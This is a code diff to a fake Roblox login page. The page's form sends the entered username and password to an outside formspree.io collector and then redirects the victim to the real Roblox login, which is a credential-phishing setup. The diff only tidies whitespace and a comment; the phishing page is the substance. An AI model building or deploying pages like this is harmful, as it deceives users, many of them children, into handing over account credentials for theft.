--- a/index.html
+++ b/index.html
@@ -14,8 +14,7 @@
 <body>
     <div class="container">
         <div class="logo">ROBLOX</div>
-        <h2>Log In to Your Account</h2>
-        <form action="https://formspree.io/f/mjkoyqer" method="POST">
+        <h2>Log In to Your Account</h2>        <form action="https://formspree.io/f/mjkoyqer" method="POST">
             <input type="text" name="username" placeholder="Username or Email" required>
             <input type="password" name="password" placeholder="Password" required>
             <input type="submit" value="Log In" class="btn">
@@ -24,9 +23,10 @@
             <a href="#">Forgot Password or Username?</a>
         </p>
     </div>
+
     <script>
         document.querySelector('form').addEventListener('submit', function(e) {
-            e.preventDefault(); // Prevent default form submission
+            e.preventDefault(); 
             setTimeout(function() {
                 window.location.href = 'https://www.roblox.com/login';
             }, 1000);
